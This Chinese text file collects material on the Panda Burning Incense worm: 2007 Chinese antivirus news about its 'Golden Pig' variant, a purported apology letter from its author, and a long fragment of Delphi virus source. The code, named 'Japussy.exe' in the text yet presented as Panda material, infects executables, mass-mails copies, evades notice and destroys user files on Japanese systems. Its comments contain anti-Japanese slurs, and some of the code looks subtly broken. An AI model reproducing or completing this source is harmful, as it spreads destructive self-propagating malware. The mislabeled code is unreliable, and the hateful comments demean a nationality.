熊猫烧香百科.txt

这是我收集的熊猫烧香病毒的一些信息

    DstStream.Write(iID, 4);
    finally
    HdrStream.Free;
    end;
  finally
    SrcStream.Free;
    IcoStream.Free;
    DstStream.SaveToFile(FileName); //替换宿主文件
    DstStream.Free;
  end;
except;
end;
end;
{ 将目标文件写入垃圾码后删除 }
procedure SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
  SetFileAttributes(PChar(FileName), 0); //去掉只读属性
  FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件
  try
    Size := GetFileSize(FileHandle, nil); //文件大小
    i := 0;
    Randomize;
    Max := Random(15); //写入垃圾码的随机次数
    if Max < 5 then
    Max := 5;
    Mass := Size div Max; //每个间隔块的大小
    Len := Length(Catchword);
    while i < Max do
    begin
    FileSeek(FileHandle, i * Mass, 0); //定位
    //写入垃圾码，将文件彻底破坏掉
    FileWrite(FileHandle, Catchword, Len);
    Inc(i);
    end;
  finally
    FileClose(FileHandle); //关闭文件
  end;
  DeleteFile(PChar(FileName)); //删除之
except
end;
end;
{ 获得可写的驱动器列表 }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do //遍历26个字母
begin
  D := Chr(i + 65);
  Str := D + ':\';
  DiskType := GetDriveType(PChar(Str));
  //得到本地磁盘和网络盘
  if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
    Result := Result + D;
end;
end;
{ 遍历目录，感染和摧毁文件 }
procedure LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
  if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and
    (SearchRec.Name <> '..') then
    Result := 0 //不是目录
  else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and
    (SearchRec.Name <> '..') then
    Result := 1 //不是根目录
  else Result := 2; //是根目录
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
  repeat
    PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列，避免引起怀疑
    if IsValidDir(SearchRec) = 0 then
    begin
    Fn := Path + SearchRec.Name;
    Ext := UpperCase(ExtractFileExt(Fn));
    if (Ext = '.EXE') or (Ext = '.SCR') then
    begin
      InfectOneFile(Fn); //感染可执行文件     
    end
    else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
    begin
      //感染HTML和ASP文件，将Base64编码后的病毒写入
      //感染浏览此网页的所有用户
      //哪位大兄弟愿意完成之？
    end
    else if Ext = '.WAB' then //Outlook地址簿文件
    begin
      //获取Outlook邮件地址
    end
    else if Ext = '.ADC' then //Foxmail地址自动完成文件
    begin
      //获取Foxmail邮件地址
    end
    else if Ext = 'IND' then //Foxmail地址簿文件
    begin
      //获取Foxmail邮件地址
    end
    else
    begin
      if IsJap then //是倭文操作系统
      begin
        if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
        (Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
        (Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
        (Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
        (Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
        (Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
          SmashFile(Fn); //摧毁文件
      end;
    end;
    end;
    //感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑
    Sleep(200);
  until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
  repeat
    if IsValidDir(SearchRec) = 1 then
    SubDir.Add(SearchRec.Name);
  until (FindNext(SearchRec) <> 0);
  end;
FindClose(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
  LoopFiles(Path + SubDir.Strings + '\', Mask);
FreeAndNil(SubDir);
end;
{ 遍历磁盘上所有的文件 }
procedure InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系统
  IsJap := True; //去死吧！
DriverList := GetDrives; //得到可写的磁盘列表
Len := Length(DriverList);
while True do //死循环
begin
  for i := Len downto 1 do //遍历每个磁盘驱动器
    LoopFiles(DriverList + ':\', '*.*'); //感染之
  SendMail; //发带毒邮件
  Sleep(1000 * 60 * 5); //睡眠5分钟
end;
end;
{ 主程序开始 }
begin
if IsWin9x then //是Win9x
  RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
else //WinNT
begin
  //远程线程映射到Explorer进程
  //哪位兄台愿意完成之？
end;
//如果是原始病毒体自己
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
  InfectFiles //感染和发邮件
else //已寄生于宿主程序上了，开始工作
begin
  TmpFile := ParamStr(0); //创建临时文件
  Delete(TmpFile, Length(TmpFile) - 4, 4);
  TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件，多一个空格
  ExtractFile(TmpFile); //分离之
  FillStartupInfo(Si, SW_SHOWDEFAULT);
  CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
    0, nil, '.', Si, Pi); //创建新进程运行之
  InfectFiles; //感染和发邮件
end;
end.

【熊猫烧香的第一版作者道歉信】


各位网友：
    你们好!我是熊猫烧香的第一版作者.
    我真的没有想到熊猫烧香在短短的两个月竟然疯狂感染到这个地步,真的是我的不对,或许真的是我低估了网络的力量,它的散播速度是我想不到的!对于所有中毒的网友,企业来说,可能是一个很大的打击,我对此表示深深的歉意!很对不起!
    我要解释一些事情,有人说熊猫烧香更改熊猫的图标是我在诋毁大熊猫!这里我要解释下,这是绝对没有的事情,完全是出于这个图片比较让我个人喜欢,才会用的!
    还有关于变种,我写这个的初衷也是这个,纯粹是为了编程研究,对于出了这么多变种,我是根本想不到的,这个责任也不全是在我的!还有人说熊猫病毒写出来是商业目的!这个完全是无稽之谈.我在这里承诺,本人是绝对没有更新过任何变种!
    关于中毒后的一些错误,有人中毒后会有蓝屏,无声,卡死,文件丢失这些现象!蓝屏和死机的原因很多可能,熊猫的主程序是不会造成电脑死机或蓝屏的,更不会把别人里面的文件弄丢失!
    还有人说我是个心理变态,我在前面已经说了,感染的速度,变种的数量是我所料想不到的.还有,我写这个病毒的初衷完全是为了编程研究.对于这个评论,我也就不多说什么了!
    最后就是关于我的身份,大家不要再猜测我是谁了,15岁的武汉男生也好,是个女的也好,某公司老总也好,杀毒厂商也好,光是新闻的评论,网友的臭骂已经让我后悔之极了!希望熊猫病毒不要再成为炒作的娱乐新闻,不要再出任何关于熊猫新闻和评论!希望安全软件公司,不要吹嘘,相互诋毁,相互炒作,尽力做出让人们信赖的好安全软件!谢谢大家!
    这是我写的一个专杀程序,肯定是比不上专业级的杀毒软件了,但是我想这是我最后能给大家做的事情了.
    熊猫走了,是结束吗?不是的,网络永远没有安全的时候,或许在不久,会有很多更厉害的病毒出来!所以我在这里提醒大家,提高网络安全意识,并不是你应该注意的,而是你必须懂得和去做的一些事情!
    再一次表示深深的歉意,同时我发出这个专杀,愿能给大家带来帮助!
                                                   熊猫烧香的作者
                                             2007年2月9日于仙桃市第一看守所

【变种：金猪报喜】


金猪报喜病毒实际就是最近熊猫烧香的新变种，

春节将至，然而广大网络用户仍没有彻底摆脱“熊猫烧香”的阴霾。伴随着大量“熊猫烧香”变种的出现，对用户的危害一浪高过一浪。1月29日，来自金山毒霸反病毒中心最新消息：“熊猫烧香”化身“金猪”，危害指数再度升级，被感染的电脑中不但“熊猫”成群，而且“金猪”满圈。但象征财富的金猪仍然让用户无法摆脱“系统被破坏，大量应用软件无法应用”的噩梦。

病毒描述：

“武汉男生”，俗称“熊猫烧香”， 近日又化身为“金猪报喜” ，这是一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件，使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成可爱金猪的模样。

　　1月30日，江民科技反病毒中心监测到，肆虐互联网的“熊猫烧香”又出新变种。此次变种把“熊猫烧香”图案变成“金猪报喜”。江民反病毒专家提醒用户，春节临近，谨防春节期间病毒借人们互致祝福之际大面积爆发。

　　专家介绍，“熊猫烧香”去年11月中旬被首次发现，短短两个月时间，新老变种已达700多种个，据江民反病毒预警中心监测到的数据显示，“熊猫烧香” 病毒去年12月一举闯入病毒排名前20名，1月份更是有望进入前10名。疫情最严重的地区分别为：广东、山东、江苏、北京和辽宁。

　　针对该病毒，江民杀毒软件KV系列已紧急升级，用户升级到最新病毒库即可有效防范该病毒于系统之外。江民“熊猫烧香”专杀工具已同步更新，未安装杀毒软件的用户可以登陆江民网站下载杀毒。此外，针对“熊猫烧香”变种频繁的特征，江民杀毒软件KV2007主动防御规则库可彻底防范“熊猫烧香”及其变种，用户可以登陆江民反病毒论坛(forum.jiangmin.com)下载使用。

　　金山毒霸反病毒专家戴光剑指出，伴随着各大杀毒厂商对“熊猫烧香”病毒的集中绞杀，该病毒正在不断“繁衍”新的变种，密谋更加隐蔽的传播方式。据不完全统计，仅12月份至今，变种数已达90多个，个人用户感染熊猫烧香的已经高达几百万，企业用户感染数还在继续上升。

此外学生寒假开始，上网人群短期内集中上升，病毒的传播速度也空前加快，所以用户在进行上网的过程中要更加警惕病毒的入侵。据了解，前几天在网络上出现了 “熊猫烧香”作者声称不再有变种出现，而“金猪”的出现再次粉碎了人们的美梦，再次将人们拉回到熊猫烧香的梦魇之中。专家称，按照目前“熊猫烧香”破坏程度，威胁将延伸至春节。

专家提醒大家，遇到“金猪”不要心慌，用熊猫烧香专杀工具就可以完全对付这只小金猪啦！


熊猫烧香变身“金猪报喜”再作乱

　　由于“熊猫烧香”病毒作者不断更新变种程序，众多杀毒软件无法跟随病毒的发展速度。
“熊猫烧香”余毒未尽，新变种接踵而来。据悉，熊猫烧香已改头换面变成新病毒“金猪报喜”。日前，江民、瑞星、金山等反病毒公司已经陆续截获大量“金猪报喜”病毒的报告，而这一病毒甚至可以清除用户机器里原有的“熊猫烧香”病毒，并自动取而代之。

　　由于“熊猫烧香”病毒作者不断更新变种程序，众多杀毒软件无法跟随病毒的发展速度。而近日出现的“金猪报喜”病毒图表，同样是可爱的小动物，但危害却在与“熊猫烧香”一样感染EXE文件外，还能感染RAR跟ZIP等格式文件。据悉目前几家反病毒厂商尚未推出针对“金猪报喜”的专杀工具。

由于春节临近，更多新 病毒可能集中出现，因此反病毒专家提醒用户要加强警惕，及时升级 杀毒软件，不要随便点击莫名来历文件。

最虔诚的病毒--熊猫烧香
　　对于这个在06年给人们带来黑色记忆的病毒，其成因只因为作者为了炫耀自己而产生，其借助U盘的传播方式也引领新的反病毒课题，但这一切都没有其 LOGO的熊猫给人的印象深刻，熊猫拿着三根香虔诚的祈祷什么？这给很多人以遐想。所以最虔诚的病毒只能颁给举着香在祈祷的熊猫。